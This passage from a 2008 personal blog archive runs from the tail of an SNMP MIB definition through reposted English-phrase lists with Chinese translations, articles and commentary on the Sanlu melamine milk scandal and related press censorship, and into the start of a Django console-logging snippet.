given by the value of ExampleNumber."

::= { foxmail 3 }

ExampleEntry OBJECT-TYPE

SYNTAX ExampleEntry

MAX-ACCESS not-accessible

STATUS current

DESCRIPTION

"An entry containing management information applicable to a

particular interface."

INDEX { UserIndex }

::= { ExampleTable 1 }

ExampleEntry ::=

SEQUENCE {

UserIndex InterfaceIndex,

UserStatus DisplayString,

CheckTime TimeTicks,

MonSet Integer32

}

InterfaceIndex ::= TEXTUAL-CONVENTION

DISPLAY-HINT "d"

STATUS current

DESCRIPTION

"A unique value, greater than zero, for each interface or

interface sub-layer in the managed system. It is

recommended that values are assigned contiguously starting

from 1. The value for each interface sub-layer must remain

constant at least from one re-initialization of the entity's

network management system to the next re-initialization."

SYNTAX Integer32 (1..2147483647)

UserIndex OBJECT-TYPE

SYNTAX InterfaceIndex

MAX-ACCESS read-only

STATUS current

DESCRIPTION

"A unique value, greater than zero, for each interface. It

is recommended that values are assigned contiguously

starting from 1. The value for each interface sub-layer

must remain constant at least from one re-initialization of

the entity's network management system to the next re-

initialization."

::= { ExampleEntry 1 }

UserStatus OBJECT-TYPE

SYNTAX DisplayString

MAX-ACCESS read-only

STATUS current

DESCRIPTION

"machine status ."

::= { ExampleEntry 2 }

CheckTime OBJECT-TYPE

SYNTAX TimeTicks

MAX-ACCESS read-only

STATUS current

DESCRIPTION

"machine status checking time."

::= { ExampleEntry 3 }

MonSet OBJECT-TYPE

SYNTAX Integer32

MAX-ACCESS read-write

STATUS current

DESCRIPTION

"An example to use set function."

::={ ExampleEntry 4}

END

From: http://bibu.blogchina.com/inc/net_snmp_doc.htm

--
Jiang Bian
Blog: http://www.b0rder.com/
Mail: borderj {at} gmail.com

英文学习资料ESLPod.com

borderj@gmail.com (Border) — Tue, 23 Sep 2008 08:24:00 +0000

1. 利用Podcast, 不用花錢也能練英文
http://kidd0601.blogspot.com/2007/05/podcast.html

2. ESLPod.com 学习笔记

http://kidd0601.blogspot.com/search/label/Podcast?max-results=5

ESL Podcast 筆記: English Cafe #84

ESL Podcast 筆記: 266 - Making a Move on Someone

3. 228句英文口語(含mp3)
http://kidd0601.blogspot.com/2007/04/228mp3.html

以下是228句英文口語要素, 附上mp3(我把原本的檔案分割成5個小段, 以方便大家練習).

雖然這些句子其實很多都是耳熟能詳而且是很生活化的東西, 但對大部分人而言真的要做到脫口而出是需要多加練習的. 就像前言講的:

"不要只是反複地、機械地、大腦幾乎麻木地讀! 一定要把這些句子變成你的拿手好戲，隨時隨地脫口而出，並經常用來自言自語以保持口腔肌肉高度靈活!"

建議把Word檔縮印出來, 把mp3放到你的mp3隨身聽, 每天給它練習唸個一遍吧.

1． It's up to you.（由你決定。）
2． I envy you.（我羡慕你。）
3． How can I get in touch with you? / How can I contact you? / How can I reach you? (我如何與您連絡)
4． Where can I wash my hands? （請問洗手間在哪里？）
5． What's the weather like today?（今天天氣如何？）
6． Where are you headed? （你要到哪里去？）
7． I wasn't born yesterday.（我又不是三歲小孩。）
8． What do you do for relaxation ?（你做什麼消遣？）
9． It's a small world.（世界真小！）
10． It's my treat this time.（這次我請客！）
11． The sooner the better. （越快越好。）
12． When is the most convenient time for you?
13． Take your time.（慢慢來/別著急。）
14． I'm mad about Bruce Lee.（我迷死李小龍了。）
I'm crazy about rock music. （我對搖滾樂很著迷。）
15． How do I address you?（我怎麼稱呼你？）
16． What was your name again? （請再說一次名字好嗎？）
17． Would you care for a cup of coffee?（要被咖啡嗎？）
18． She turns me off.（她使我厭煩。Turn on <-> turn off）
19． So far so good.（目前為止，一切都好。）
20． It drives me crazy.（它把我逼瘋了。）
21． She never showed up.（她一直沒有出現。）
22． That's not like him.（那不像是他的風格。）
23． I couldn't get through.（電話打不通。）
24． I got sick and tired of hotels.（我討厭旅館。）
25． Be my guest.（請便、別客氣）
26． Can you keep an eye on my bag?（幫我看一下包好嗎？）
27． Let's keep in touch.（讓我們保持聯繫。）
28． Let's call it a day[決定或同意暫時或永久停止（進行某事）
29． I couldn't help it.（我沒辦法。）
30． Something's come up[發生/出現].（有點事/出事了）
31． Let's get to the point[要點/核心問題].（讓我們來談要點。）
32． Keep that in mind.（記住那件事。）
33． That was a close call.（太危險了/千鈞一髮）
34． I'll be looking forward to it.（我將期待這一天。）
35． Chances are slim[渺茫的；微小的].（機會很小。）
36． Far from it.（一點也不。Not at all）
37． I'm behind in my work.（我工作進度落後了。）
38． It's a pain in the neck[麻煩的事（人）].（那真是件麻煩事）
39． We're in the same boat.（我們處境相同。）
40． My mouth is watering.（我在流口水了。）
41． What do you recommend?（你推薦什麼？）
42． I ache all over.（我渾身酸痛。）
43． I have a runny nose.（我流鼻涕。）
44． It's out of the question.（這是不可能的。）
45． Do you have any openings?（你們有空缺嗎？）
46． It doesn't make any difference.（沒什麼差別/無所謂。）
47． I'm fed up with him.（我受夠他了。）
48． You can count on us.（你可以信賴我們。）
49． It doesn't work.（壞了；不動了。）
50 It's better than nothing.（總比什麼都沒有好。）
51． Think nothing of it.（別放在心上。）
52． I'm not myself today.（我今天心神不寧。）
53． I have a sweet tooth.（我喜歡吃甜食。）
54． I can't express myself very well in English.（我不能很好地用英語表達自己。）
55． For the time being.（暫時；暫且；目前）
56． This milk has gone bad.（這牛奶變質了。）
57． Don't beat around the bush. （別拐彎抹角了。）
58． It's up in the air.（尚未確定。）
59． Math is beyond me.（我對數學無能為力。）
60． It slipped my mind.（我忘了。）
61． You can't please everyone.（你不可能討好每一個人。）
62． I'm working on it.（我正在努力。）
63． You bet!（當然！）/ I can't come out with it.
64． Drop me a line.（寫封信給我）
65． Are you pulling my leg?（你在開我玩笑嗎？）
66． Sooner or later.（遲早會的。）
67． I'll keep my ears open.（我會留意的。）
68． It isn't much.（那是微不足道的。）
69． Neck and neck.（不分上下。）
70． I'm feeling under the weather.（我覺得不舒服/精神不好/情緒低落。）
71． Don't get me wrong[誤解].（不要誤會我。）
72． I'm under a lot of pressure.（我壓力很大。）
73． You're the boss.（聽你的。）
74． It doesn't make any sense!（毫無意義！）
75． What's this regarding?（這是關於哪方面的？）
76． Over my dead body!（休想！）
77． Can you give me a hand?（你能幫個忙嗎？）
78． We have thirty minutes to kill.（我們有三十分鐘空閒時間。）
79． Whatever you say.（隨便你。）
80． It'll come to me.（我會想起來的。）
81． You name it!（你說出來。）
82． If I were in your shoes.（如果我是你的話。）
83． Time will tell.（時間會證明的。）
84． I will play it by ear.（我會見機行事的；到時候再說。）
85． You should take advantage of it.（你應該好好利用這個機會。）
86． Let's talk over coffee.（我們邊喝邊談。）
87． Take it easy.（輕鬆一點；別緊張；放鬆放鬆；再見。）[這是美國人最喜歡說的話，也可作離別用語。]
88． I'm easy to please（我很容易取悅/相處。）
89． Let's give him a big hand.（讓我們熱烈鼓掌。）
90． As far as I'm concerned.（就我而言。）
91． I'm all mixed up.（我全搞混了。）
92． Let's get together one of these days.（找一天聚聚。）
93． He's behind the times.（他落伍了/跟不上時代了。Out of date）
94． I'm pressed for time.（我時間緊迫。）
95． I'm up to my ears in work.（我忙死了。）
96． You can't do this to me.（你不能這麼對我。）
97． Just to be on the safe side. （為了安全起見。）
98． I hope I didn't offend you.（希望沒有冒犯你。）
99． It won't take much time.（不會花很長時間的。）
100． It's been a long time.（好久不見了。）
101． It's nothing.（小事情；不足掛齒。）
102． It's a long story.（說來話長。）
103． It's about time.（時間差不多了。）
104． It's incredible.（難以置信！）
105． It's hard to say.（難說。）
106． I can't imagine why.（我想不通為什麼。）
107． That can't be.（不可能。）
108． That's really something.（真了不起。）
109． Are you sure?（你確信嗎？）
110． Are you crazy?（你瘋了嗎？）
111． Excuse me for a moment.（失陪一會兒。）
112． I mean it. I'm serious. I'm no kidding!（我是認真的。）
113． I'll consider this matter.（我會考慮這件事的。）
114． I'll do something about it.（我會想辦法的。）
115． What are you talking about?（你在說些什麼？）
116． I'm afraid I can't.（恐怕我不行。）
117． I'm dying to see you.（我真想見你。）
118． I'm flattered.（過獎了。）
119． I'm not in the mood.（我沒心情。）
120． I'm so scared.（我怕極了。）
121． I can't make it.（我去不了/我趕不上。）
122． You can never tell.（不知道/誰也沒把握。）
123． I won't buy your story.（我不信你那一套。）
124． That hurts like hell!（疼死啦！）
Must hurt like hell
125． It can't be helped.（無能為力。）
126． Sorry to bother you.（抱歉打擾你。[事前]）
Sorry to have bothered you.（抱歉打擾你。[事後]）
127． I'm always punctual.（我總是很準時。）
128． You may leave it to me.（交給我來辦。）
129． I wish I could.（不行。）[委婉表達法]
130． What's the rush?（什麼事那麼匆忙？）
131． What's so funny（有什麼好笑的？）
132． I couldn't agree more.（我完全同意。）
133． Stay out of this matter, please.（請別管這事。）
134． Don't just shake you head.（別光搖頭，想想辦法！）
135． Don't jump to conclusions.（別倉促/過早下結論。）
136． That was a lousy movie.（那電影糟透了！）
137． Have you thought about staying home?（是否考慮在家呆著？）
138． I'll come. I give you my word.（我會來的。我向你保證。）
139． I swear I'll never tell anyone.（我發誓不告訴任何人。）
140． I'll make it up to you.（我會賠償的。）
141． I'm very / really / terribly / awfully / extremely sorry.（十分抱歉！）
142． Forgive me for breaking my promise.（原諒我食言。）
143． Let's forgive and forget.（讓我們擯棄前嫌。）
144． I've heard so much about you!（久仰大名！）
145． Don't underestimate me.（別小看我。）
146． She gives me a headache.（她讓我頭疼。）
147． It's very annoying.（真煩人。）
148． He often fails to keep his word.（他常常不遵守諾言。）
149． You made me feel ashamed of myself.（你讓我感到羞愧。）
150． I hope it turns out all right.（我希望結果很好。）
151． I can't handle this alone.（我無法單獨處理這事。）
152． How long will it take to have this radio fixed?（修理這收音機要多久？）
153． Come to me if you're in any difficulty.（有困難來找我。）
154． Who do you think you are?（你以為你是誰？）
155． You're wasting you breath.（你在白費口舌。）
156． It doesn't seem like that.（似乎不像是那樣。）
157． Don't get on my nerves!（不要攪得我心煩。）
158． Everything will be fine.（一切都會很好。）
159． I'll be ready in a few minutes.（再過幾分鐘就好了。）
160． I wonder what happened to him.（我不知道他出什麼事了。）
161． You are just trying to save face.（你只是想挽回面子。）
162． His argument doesn't hold water.（他的論點站不住腳。）
163． Your face tells it all.（你的表情透露了一切。）
164． The days are getting longer.（白天越來越長了。）
165． You've got to do something.（你一定要想辦法。）
166． I hope this will teach you a lesson.（希望這會給你一個教訓。）
167． I feel younger than ever.（我覺得比以前年輕。）
168． It's a hard job, but I hope he can make it.（這是件困難的差事，但我希望他能做到。）
169． Don't look wise.（別自作聰明。）
170． I'm afraid all my efforts were in vain.（我擔心我的努力全白費了。）
171． What happened to you memory?（你的記性是怎麼搞的？）
172． You're going too far!（你太過分了！）
173． Don't bury your head in the sand.（不要逃避現實。）
174． I have no other choice.（我別無選擇。）
175． I don't have the nerve to do it.（我沒膽/勇氣去做。）
176． It's a matter of life and death.（事關生死。）
177． Nothing works.（什麼都不對勁兒。）
178． Money will come and go.（錢乃身外之物。）
179． He's been behind bars for almost 30 years.（他坐了將近30年牢。）
180． If I had known that, I could have helped you.（假如我早知道，我就能幫你了。）[最實用的虛擬語氣]
181． I couldn't care less.（我不在乎。）
182． You have my word.（我保證。）
183． He hit the ceiling at the news.（他聽到那消息暴跳如雷/大發雷霆。）
184． I don't mind staying up late.（我不在乎熬夜。）
185． You're too outspoken.（你太直率了。）
186． I can't afford to buy that.（我承擔/買不起。）
187． I think it's a reasonable price.（我覺得這是個合理的價錢。）
188． I'd like to try on these hats.（我想試試這些帽子。）
189． He puts me to shame.（他使我蒙羞。）
190． Every dog has its day.（凡人皆有得意時。）
191． Don't give me any excuses.（不要給我任何理由。）
192． Are you out of you mind?（你瘋了嗎？）
193． He's been everywhere.（他到處都去過了。）
194． What's bothering you?（什麼在困擾你？）
195． Who is to blame?（該怪誰？）
196． There're a lot of rumors going around.（很多流言流傳著。）
197． I don't feel up to that.（我覺得不能勝任那工作。）
198． I'm mad at myself.（我生自己的氣。）
199． It's raining cats and dogs.（下著傾盆大雨。）
200． The sky is getting very cloudy.（天空的雲越來越多了。）
201． You won't get away with this.（你逃不掉懲罰的。）
202． I'm tired of going to school day after day.（我厭倦每天上學。）
203． Who am I supposed to see?（我應該去見誰？）
204． His idea is childish.（他的想法很幼稚。）
205． I need small change.（我需要零錢。）
206． Don't try to wash my brain (brainwash me).（別想給我洗腦。）
207． I don't seem to have any luck today.（我今天運氣不好。）
208． That reminds me.（那提醒了我。）
209． What the hell are you doing?（你到底在做什麼？）
210． I can't seem to get to sleep.（我好象睡不著。）
211． You look very serious about something.（你似乎有很嚴重的事。）
212． I hope I'm not in the way.（我希望沒有造成妨礙。）
213． What are you so excited about?（什麼事讓你如此興奮？）
214． Tell me about you trouble.（把你的煩惱告訴我。）
215． I feel much better now.（我感覺好多了。）
216． I hope you will get well soon.（希望你很快會恢復。）
217． She is sick in bed.（她臥病在床。）
218． I have a slight fever.（我輕微發燒。）
219． A fool never learns.（傻瓜永遠學不會。）
220． This is the schedule for tomorrow.（這是明天的日程安排。）
221． How late are you open?（你們營業到多晚？）
222． I'm here on business.（我來這裏出差。）
223． What's Hong Kong famous for?（香港以什麼聞名？）
224． What brings you to Beijing?（什麼風把你吹到北京來的？）
225． She looks blue.（她滿面憂傷。）
226． I just don't know what to say.（我就是不知道說什麼。）
227． Let's have fun tonight.（今晚讓我們狂歡。）
228． Thank you for coming to see me off.（謝謝你來為我送行。）

按此下載
(不能下載請留言通知我, 謝謝)

其他閱讀:
百句吵架英文

4. 轉載: 百句吵架英語
http://kidd0601.blogspot.com/2007/04/blog-post.html

不知道原作者是誰. 如有版權問題請留言跟我講一下我把他拿掉. 有機會~~(有空)~~的話我問看看有沒有美國同學要唸一下讓我錄起來分享.

1.Stop complaining! 別發牢騷！
2.You make me sick! 你真讓我噁心！
3.What's wrong with you? 你怎麼回事？
4.You shouldn't have done that! 你真不應該那樣做!
5.You're a jerk! 你是個廢物/混球！
6.Don't talk to me like that! 別那樣和我說話!
7.Who do you think you are? 你以為你是誰？
8.What's your problem? 你怎麼回事啊？
9.I hate you! 我討厭你！
10.I don't want to see your face! 我不願再見到你！
11.You're crazy! 你瘋了!
12.Are you insane/crazy/out of your mind? 你瘋了嗎？（美國人絕對常用！）
13.Don't bother me. 別煩我。
14.Knock it off. 少來這一套。
15.Get out of my face. 從我面前消失！
16.Leave me alone. 走開。
17.Get lost.滾開！
18.Take a hike! 哪兒涼快哪兒歇著去吧。
19.You piss me off. 你氣死我了。
20.It's none of your business. 關你屁事！
21.What's the meaning of this? 這是什麼意思？
22.How dare you! 你敢！
23.Cut it out. 省省吧。
24.You stupid jerk! 你這蠢豬！
25.You have a lot of nerve. 臉皮真厚。
26.I'm fed up. 我厭倦了。
27.I can't take it anymore. 我受不了了！（常用）
28.I've had enough of your garbage. 我聽膩了你的廢話。
29.Shut up! 閉嘴！
30.What do you want? 你想怎麼樣？
31.Do you know what time it is? 你知道現在都幾點嗎？
32.What were you thinking? 你腦子進水啊？
33.How can you say that? 你怎麼可以這樣說？
34.Who says? 誰說的？
35.That's what you think! 那才是你腦子裏想的！
36.Don't look at me like that. 別那樣看著我。
37.What did you say? 你說什麼？
38.You are out of your mind. 你腦子有毛病！
39.You make me so mad.你氣死我了啦。
40.Drop dead. 去死吧！
41.fuck off. 滾蛋。
42.Don't give me your shit. 別跟我胡扯。
43.Don't give me your excuses/ No more excuses. 別找藉口。
44.You're a pain in the ass. 你這討厭鬼。
45.You're an asshole. 你這缺德鬼。
46.You bastard! 你這雜種！
47.Get over yourself. 別自以為是。
48.You're nothing to me. 你對我什麼都不是。
49.It's not my fault. 不是我的錯。
50.You look guilty. 你看起來心虛。
51.I can't help it. 我沒辦法。
52.That's your problem. 那是你的問題。
53.I don't want to hear it. 我不想聽！
54.Get off my back. 少跟我囉嗦。
55.Give me a break. 饒了我吧。
56.Who do you think youre talking to? 你以為你在跟誰說話？
57.Look at this mess! 看看這爛攤子！
58.Youre so careless. 你真粗心。
59.Why on earth didn't you tell me the truth? 你到底為什麼不跟我說實話？
60.I'm about to explode! 我肺都快要氣炸了！
61.What a stupid idiot! 真是白癡一個！
62.I'm not going to put up with this! 我再也受不了啦！
63.I never want to see your face again! 我再也不要見到你！
64.That's terrible. 真糟糕！
65.Just look at what you've done! 看看你都做了些什麼！
66.I wish I had never met you. 我真後悔這輩子遇到你！
67.You're a disgrace. 你真丟人！
68.I'll never forgive you! 我永遠都不會饒恕你！
69.Don't nag me! 別在我面前嘮叨！
70.I'm sick of it. 我都膩了。
71.You're such a bitch! 你這個婊子!
72.Stop screwing/ fooling/ messing around! 別鬼混了！
73.Mind your own business! 管好你自己的事！
74.You're just a good for nothing bum! 你真是一個廢物！/ 你一無是處!
75.You've gone too far! 你太過分了！
76.I loathe you! 我討厭你！
77.I detest you! 我恨你！
78.Get the hell out of here! 滾開!
79.Don't be that way! 別那樣！
80.Can't you do anything right? 成事不足，敗事有餘。
81.You're impossible. 你真不可救藥。
82.Don't touch me! 別碰我！
83.Get away from me! 離我遠一點兒！
84.Get out of my life. 我不願再見到你。/ 從我的生活中消失吧。
85.You're a joke! 你真是一個小丑！
86.Don't give me your attitude. 別跟我擺架子。
87.You'll be sorry. 你會後悔的。
88.We're through. 我們完了！
89.Look at the mess you've made! 你搞得一團糟！
90.You've ruined everything. 全都讓你搞砸了。
91.I can't believe your never. 你好大的膽子！
92.You're away too far. 你太過分了。
93.I can't take you any more! 我再也受不了你啦！
94.I'm telling you for the last time! 我最後再告訴你一次！
95.I could kill you! 我宰了你！
96.That's the stupidest thing I've ever heard! 那是我聽到的最愚蠢的事！
97.I can't believe a word you say. 我才不信你呢!
98.You never tell the truth！你從來就不說實話！
99.Don't push me ! 別逼我！
100.Enough is enough! 夠了夠了！
101.Don't waste my time anymore. 別再浪費我的時間了！
102.Don't make so much noise. I'm working. 別吵，我在幹活。
103.It's unfair. 太不公平了。
104.I'm very disappointed. 真讓我失望。
105.Don't panic! 別怕!
106.What do you think you are doing? 你知道你在做什麼嗎？
107.Don't you dare come back again! 你敢再回來！
108.You asked for it. 你自找的。
109.Nonsense! 鬼話！

--
Jiang Bian
Blog: http://www.b0rder.com/
Mail: borderj {at} gmail.com

中国开始管制三鹿毒奶粉负面报导

borderj@gmail.com (Border) — Wed, 17 Sep 2008 02:06:00 +0000

中国开始管制三鹿毒奶粉负面报导

中国三鹿奶制品有毒事件的报导越来越多，引起了世界舆论的关注。中国当局开始控制有关的负面报导，争取再次做到舆论一律、内外有别。

南华早报记者从北京报导，河北三鹿公司出产的奶粉造成数人死亡、一千多儿童患病的严重后果。中国政府已经逮捕了两名河北奶农兄弟。而新西兰政府已指出，河北方面隐瞒不报，确实负有不可推卸的责任。

*要求媒体按新华社统一口径*

面对三鹿奶制品事件的曝光和由此产生的巨大负面效应，中国政府开始权衡利弊，收紧报导口子，让各媒体只能用新华社的通稿。南华早报说，中国青年报已经开始这样做了。

中央电视台人士说，上星期五就接到了通知，说只能采用新华社的通稿。还有的记者说，的确已经下文件，让新闻单位最好不要报导有关的评论和儿童因这种奶制品而患有肾结石的事情。

报导说，河北的媒体基本没有什么报导，因为省委宣传部已经下令要大家不要"炒作"这个新闻。

中国的资深媒体工作者昝爱宗说，当局这样做，是因为有传统和惯性在里面："每次发生重大的突发性事件，包括重大的食品安全和安全生产的事件，很容易引起群体性事件。宣传部门一般都要求用新华社的通稿。因为新华社的通稿，一是新华社记者都知道，该写什么，不该写什么。一般就是简要记述事件简单的情况，不会报导内幕和背景。"

原公益时报主编、资深新闻工作者陈杰人说，让大家都用新华社的通稿，从发布命令的单位和机构来说，也许有它自己的道理："也许，它有它善良的用意，希望不要引起恐慌。但我认为，不管什么事情，让媒体能充分自由地报导，真正有助于澄清真相，避免损害的扩大。"

陈杰人说，中国控制舆论和报导有其传统，但最近这些年来，的确有所放松。比如三鹿奶制品事件和山西溃坝事件等等。陈杰人说，三鹿事件的确涉及到了公共安全，有关方面的确不应该控制媒体的报导自由。应让媒体自由报导，从而达到监督的效果。

中国多家门户网站比如百度、搜狐、新浪都报导，三鹿奶制品事件曝光后，该公司曾和百度联系，希望能出三百万公关费用，让百度这个中国最大的搜索引擎网站帮助封杀和屏蔽相关的负面新闻，遭到了百度的断然拒绝。

浙江资深媒体工作者昝爱宗说，百度拒绝三鹿集团用三百万公关费来消除负面新闻的请求，也许因为多种因素。如果三鹿把公关费用提高到一千万、两千万，或者，三鹿通过政府给这些互联网门户网站施加压力，昝爱宗认为，那么很可能，百度就会顶不住经济或政治压力而屏蔽相关报导。

他说："比如，浙江台州有个晚报，把台湾说成一个国家。百度上搜索，一大串一大串，后来再搜索，什么都没有。还有就是浙江发改委主任史久武，跳楼自杀，前几天还百度上有许多相关报导。过几天再一看，就什么都没有了。"

昝爱宗说，政府要想控制百度，实在是太容易了。有无数的证据证明，新浪、百度、搜狐都很听话。昝爱宗说，三鹿毒奶制品事件，官方也震怒，老百姓也发怒，百度完全没必要为了区区三百万而牺牲自己。

From: http://doubans.com/thread-293-1-1.html

--
Jiang Bian
Blog: http://www.b0rder.com/
Mail: borderj {at} gmail.com

伊利雪條含三聚氰胺需回收

borderj@gmail.com (Border) — Wed, 17 Sep 2008 02:00:00 +0000

伊利雪條含三聚氰胺需回收

(明報)9月16日星期二 17:20

食環署發現「伊利牧場大果粒酸奶味雪條」(90毫升)的一個樣本含有三聚氰胺，有關產品將全線回收。

惠康發出通告稱，即時暫停發售伊利牌所有雪條及雪糕產品。由9月17日(星期三) 起，顧客可攜同產品到任何一間惠康超級市場退款。為方便顧客，是次退貨毋須收據。

這是內地第二間奶製品公司，被發現在產品中含有三聚氰胺，河北三鹿嬰兒奶粉較早時含有三聚氰胺，有逾千名嬰兒食用奶粉後患上腎結石，其中2名嬰兒死亡.

From: http://www.bullog.cn/blogs/lianyue/archives/178412.aspx

--
Jiang Bian
Blog: http://www.b0rder.com/
Mail: borderj {at} gmail.com

三鹿的文件下来了，五毛们，准备出发！ - Free talk ! - 热衷八卦事业的兴趣小组

borderj@gmail.com (Border) — Wed, 17 Sep 2008 01:57:00 +0000

三鹿的文件下来了，五毛们，准备出发！

关于做好"三鹿"奶粉受污染事件网上宣传管理的提示（转贴）

　　近日，河北"三鹿"奶粉受污染事件引起网民关注。现就做好网上相关宣传管理工作提以下要求：

　　1、严格规范稿源，网上报道只转发新囧社、人民囧报等中央主要新闻单位稿件。

　　2、关于此事件的报道不作头条，不开专题。要重点报道政府采取的处置措施及进展，报道医疗部门对致病儿童的积极救治。

　　3、论坛、博客等互动栏目中不把此事作为推荐话题，不置顶，论坛言论的数量和气氛要作适当控制，防止炒热。

　　4、坚决封堵和删除将矛头指向党和政府、煽动维权上访、散布谣言等有害信息。

　　5、组织网评员开展网上引导。引导口径以卫生部等部门对外发布的正面信息为准，积极引导网民支持党和政府的态度和立场，相信有关部门所作的努力及取得的成效。

宣传提示
　　甘肃婴儿患泌尿系统结石病，涉及石家庄三鹿集团。食品安全，事关国计民生及国家的形象信誉，请各地指导属地网媒在宣传报道中注意稳妥把握以下两点：

　　一是不要过分炒作，不要对其它食品安全做链接报道，避免放大食品安全问题，给大局添乱。

　　二是不要做猜测性报道，对重大食品质量安全问题的报道要以权威部门发布的信息为准，各媒体不得自行组织采访报道，不要轻易下结论，避免授人以柄。

From: http://doubans.com/thread-276-1-1.html

2008.9.17
--
Jiang Bian
Blog: http://www.b0rder.com/
Mail: borderj {at} gmail.com

三鹿奶粉事件的命门

borderj@gmail.com (Border) — Tue, 16 Sep 2008 01:47:00 +0000

中国真是个人祸遍地的国家，以至于天灾背后从来不缺少人祸之推手。在每天发生的众多人祸里，又有许多是明知故犯；不只是明知故犯，而是纵容着犯；不只是纵容着，出现了问题，还竭力包庇、掩盖、推委，对这些事故重大的人祸，从来都没有一个像样子的处理方案。面对人祸危机，从政府到事故方，他们要做的是不清查事故，公开相关的信息，彻查当事人，向受害者赔理偿道歉。而是政府和事故方合起来，掩盖事实真相，坑害民众利益。这次三鹿奶粉事件，只不过是中国众多人祸事件的又一次东窗事发罢了。

为什么政府和产方一而再，再而三的出现大规模坑害民众的事，但民众就没有办法制止自己的权益不受侵害呢？其根源当然是源于政府的执政不是民众选举的结果，而且政府之所以不承认自己所犯的错，那就是因为民众无法用选票将不称职的政府选下台，因为目前中国民众的选票依旧是一张象征意义大过实际用途的废纸。中央政府到各级地方政府的权力不受约束，民众不能真正制约他们不作为或者乱作为乃至作恶，才是一切人祸频发的总根源。请记住，每天频发的大大小小的灾难里所包含的人祸因素，无一例外指向这个政府的权力来源和合法性，可谓万箭猬集。这个政府中的有识之士也深知这一点，但没有竞争对手的六十年"单干"已经使执政党和政府百孔千疮，他们被巨大而恶劣的执政习惯，被权力集团的利益所裹狭，已经上了一趟混装各种危险品的快速列车，既缺乏紧急处置的能力，也不想改变方向，清除掉车上的危险品。只是在那里像征性地高喊三十年改革开放，却不做一星半点的政治改革的实质举措。这样的政府管制下出现许多匪夷所思的对民众生命的漠视，实在他们执政特质之体现。

我这样说，不仅有历史纪录，有理论根据，而且更有现实的靶子。三鹿奶粉总部所在地石家庄政府在卫生部的调查报告尚未出笼的时候，他们已开足马力，为袒护三鹿奶粉殚精竭虑。三鹿奶粉方面与当地政府穿了连裆裤是傻子都看出来的道理。三鹿产方和石家庄政府，甚至是卫生部、国家质检局等相关部门都是极有瓜葛的利益相关单位。这些利益相关单位早都从内部获知消费者投诉或者医院病况，但是为了所谓稳定，为了奥运，为了更多的相关利益链，他们当然可以置人命于不顾。中央政府有稳定的压力，各部门有自己官员的官帽和实际受贿利益，当地政府的税收以及GDP，大批与此相关官员的贪腐，组合在一起成了类似三鹿奶粉这种企业危害民众利益而不受真正惩处的保护伞。商业利益使得这个保护伞的组合不只是政府各部门的贪腐与违法，而且连结到新闻媒体在其间的猫腻。新闻媒体受官方之打压，不能随意报道，我们暂且不说了，因为没有新闻自由。但新闻媒体和产家的利益瓜葛，因广告的投放的竞争，难以避免利益交换。这种利益交换的得益者，当然是产方和新闻媒体，损害的是民众的知情权，从而损害民众利益，危及民众生命安全。同样的利益交换，当然更大规模地发生在与企业相关的政府行业主管部门，这里面的贪污腐败形成了有效的利益链锁，彻底出卖了民众的利益，所以你看到许多利益相关的政府部门、官员、媒体及其从业人员，联合起来愿意为不法产商背书，你一点都不要吃惊。到要追究责任的时候，要么拿钱来不了了之，要么允许你走起诉的过场，但公检法也在后面等着不法产商送好处去，连怎么背书的调子都已经定好了。也就是说，当一个产家通过许多关系使自己变成一地乃至国家的龙头企业后，这样的企业危害起民众的利益来，民众要讨回会的利益可谓难上加难。

这里面有一个充满痛苦的悖论：消费者在不知情与信息不充分，在媒体的误导并且压制了所有该企业的负面新闻，在虚假广告的诱惑下，使得消费者成就了某一个商品成为所谓的名牌，而一旦成了名牌，你要是受到了它的伤害，那它的力量就千百倍地能够弹压消费者。因为中国产品的名牌都是各种相关利益链（唯一不受重视的是消费者的利益）所组成的，而这相关利益链最可怕当然是政府在其间的贪腐和媒体在其间的误导。但不幸的是，中国没有哪一次伤害民众的事件，不是由政府相关部门乱作为乃至作恶，媒体受压误导或者受利益关联袒护而造成的。在中国社会，这就形成了一个通过不合法手段形成的强者通吃的社会局面，遍布各个阶层。而民众作为利益个体，利益分散，不容易组织起来，不容易形成合力来与这些不法的政府部门和虚假新闻媒体作斗争。因为你不仅没有言论自由，而且你没有游行、结社等宪法赋予的自由。

如果不在制度设计上加以改革，那么民众作为利益受害者而得不到实质性赔偿的命运不仅无法改变，而且你只要你生在中国，你是普通民众，那么你就注定你受害的必然性。只是你受害的程度多少、家害时间的长短、受害秩序的先后而已。换言之，在中国做一个不受伤害的民众，或者说受到伤害而能得到真正公正补偿的民众，你的概率是无限趋近于零。也就是说，在中国，如果你是普通民众，你一生都未受到过不公正对待，没有受到过伤害，其概率比中六合彩还难。三鹿奶粉事件不单纯是个食品安全事件——海外国家只需要拒绝进口中国这样的食品就行——但对中国来说，只是拒买或者惩罚三鹿奶粉是远远不够的。因为一个三鹿倒下了，千百万个三鹿站起来了。查出了三鹿奶粉的问题乃至我们幻想着能够合法处理它，在没有真正的制度保障食品安全问题的情形下，只不过是那些目前尚在扮演安全角色而实则一样有安全问题的企业在偷偷发笑，从中获益。普通民众的利益依旧不能得到真正的保障，普通民众成了永远的受害者。任何民众利益的大规模受损，最终矛盾的焦点，无一例外指向最高当轴的民主政治改革，三鹿奶粉事件中诸方利益的博弈，受害方要得到真正完全公平公开公正的处理与赔偿，并且有效杜绝此类事件再次发生，必须仰赖中国的民主政治体制改革。我个人认为，中国社会已经到了充满很大危机的十字路口。(冉云飞)

From: http://vision.blogbus.com/logs/28910451.html

--
Jiang Bian
Blog: http://www.b0rder.com/
Mail: borderj {at} gmail.com

[Django] Console logging

borderj@gmail.com (Border) — Mon, 05 May 2008 17:09:00 +0000

在setting.py的尾部增加下面几句：

import logging
# Enable info logging by the app (this is separate from appserver's
# logging).
FORMAT='[%(asctime)s] %(levelname)s\t%(message)s'
formatter = logging.Formatter(FORMAT)
logging.basicConfig(format=FORMAT, level=logging.DEBUG) # log sur console

PS: 在网上找到一个比较全的logging处理方法，记录一下
From： http://snipplr.com/view.php?codeview&id=5519

#!/usr/bin/env python
# -*- coding: utf-8 -*

u"""Program name - short description

Example usage
=============

.. sourcecode:: bash

    python program_name.py -vvvvv action

:author: `Name Surname foo@example.com>`__
"""

# Pylint checks
# "line to long" pylint: disable-msg=C0301
# "Used * or ** magic" pylint: disable-msg=W0142

__revision__ = "$Id$"
__docformat__ = 'restructuredtext en'

import os, sys, logging, optparse

#: Glogbal logger instance
LOG = logging.getLogger(__name__)
#: Debug level names as a string
LOG_HELP = ','.join(["%d=%s" % (4-x, logging.getLevelName((x+1)*10)) for x in xrange(5)])
#: Console LOG format
LOG_FORMAT_CONS = '%(asctime)s %(name)-12s %(levelname)8st%(message)s'
